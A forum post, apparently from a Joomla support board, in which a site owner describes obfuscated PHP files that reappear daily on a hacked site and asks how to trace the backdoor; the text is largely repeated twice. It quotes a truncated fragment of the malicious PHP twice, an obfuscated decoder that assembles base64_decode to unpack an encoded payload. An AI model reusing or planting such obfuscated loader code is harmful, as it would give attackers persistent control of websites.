Bunchadogs
Perch
I have a website that was recently hacked - reported by Google/Norton/etc. and blacklisted everywhere - what a nightmare!
We were able to get it MOSTLY cleaned up - enough that Google and the others 'scanned' it and reported as clean again.
However - there is still a problem. Just about every day a few PHP files will appear in random locations.
They have random file names and appear in random locations, (rarely the same) and the contents are encoded:
I can find these files easily enough - but I can't identify WHERE they are coming from.
The website is built on Joomla - we've updated to the lastest 3.5.x version, updated plugins, etc.
At one point we changed EVERY user password (via PHPmyAdmin) and the FTP password and the MySQL password. We only updated the config file with the new SQL password - to keep the site running - but didn't login anywhere else. We didn't even update the FTP password in the config file. All of that was done via a clean and secure laptop, all via the Control Panel.
The idea was to isolated any infected PCs and make sure the "leak" was coming from an outside user...
No luck - the same evening multiple files showed up again. The laptop used to reset all the passwords was not connected to any network at the time, so I am 100% certain the source of the files is not an infected PC.
I can NOT find these files in the Access Log, under the Control Panel.
Interesting side note - we've blocked a LOT of IP addresses and ranges (via htaccess) and the day AFTER a file appears I can see a number of error message where a request was rejected for the same file I previously deleted. The rejection is based on our IP blocking.
Any ideas how I can track down the SOURCE of these PHP files?
I'm assuming it's a back door of some sort, but I have not had any luck tracking it down.
We've deleted entire directory structures and replaced them with new installs - but that doesn't seem to help.
I've scoured the logs via the Control Panel (Access and Error) and used some of the info to block IP addresses and even identify a few files. But the mystery files still appear almost every day.
If I supply a file name and directory can Jodo identify WHERE that file came from?
Anyone else have any ideas how to track down the source of the problem?
We were able to get it MOSTLY cleaned up - enough that Google and the others 'scanned' it and reported as clean again.
However - there is still a problem. Just about every day a few PHP files will appear in random locations.
They have random file names and appear in random locations, (rarely the same) and the contents are encoded:
<?php
$eieahu = 4357; function tjyjq($nomeyctqc, $qtkqhm){$yqnpmwt = ''; for($i=0; $i < strlen($nomeyctqc); $i++){$yqnpmwt .= isset($qtkqhm[$nomeyctqc[$i]]) ? $qtkqhm[$nomeyctqc[$i]] : $nomeyctqc[$i];}
$qhnnrpwfve="base" . "64_decode";return $qhnnrpwfve($yqnpmwt);}
$mfhprk = 'NZ2CztXkKlNb5JtOxVXOlJn9KOxEcHgtsHwLowiTNZ2CztXkKlNb5'.
'Jn9KdX2xM59xMqMFU8wTsEhU07LAV2GxJtiTUSfQlmGKlm2QPtizWXClP4L'.
$eieahu = 4357; function tjyjq($nomeyctqc, $qtkqhm){$yqnpmwt = ''; for($i=0; $i < strlen($nomeyctqc); $i++){$yqnpmwt .= isset($qtkqhm[$nomeyctqc[$i]]) ? $qtkqhm[$nomeyctqc[$i]] : $nomeyctqc[$i];}
$qhnnrpwfve="base" . "64_decode";return $qhnnrpwfve($yqnpmwt);}
$mfhprk = 'NZ2CztXkKlNb5JtOxVXOlJn9KOxEcHgtsHwLowiTNZ2CztXkKlNb5'.
'Jn9KdX2xM59xMqMFU8wTsEhU07LAV2GxJtiTUSfQlmGKlm2QPtizWXClP4L'.
I can find these files easily enough - but I can't identify WHERE they are coming from.
The website is built on Joomla - we've updated to the lastest 3.5.x version, updated plugins, etc.
At one point we changed EVERY user password (via PHPmyAdmin) and the FTP password and the MySQL password. We only updated the config file with the new SQL password - to keep the site running - but didn't login anywhere else. We didn't even update the FTP password in the config file. All of that was done via a clean and secure laptop, all via the Control Panel.
The idea was to isolated any infected PCs and make sure the "leak" was coming from an outside user...
No luck - the same evening multiple files showed up again. The laptop used to reset all the passwords was not connected to any network at the time, so I am 100% certain the source of the files is not an infected PC.
I can NOT find these files in the Access Log, under the Control Panel.
Interesting side note - we've blocked a LOT of IP addresses and ranges (via htaccess) and the day AFTER a file appears I can see a number of error message where a request was rejected for the same file I previously deleted. The rejection is based on our IP blocking.
Any ideas how I can track down the SOURCE of these PHP files?
I'm assuming it's a back door of some sort, but I have not had any luck tracking it down.
We've deleted entire directory structures and replaced them with new installs - but that doesn't seem to help.
I've scoured the logs via the Control Panel (Access and Error) and used some of the info to block IP addresses and even identify a few files. But the mystery files still appear almost every day.
If I supply a file name and directory can Jodo identify WHERE that file came from?
Anyone else have any ideas how to track down the source of the problem?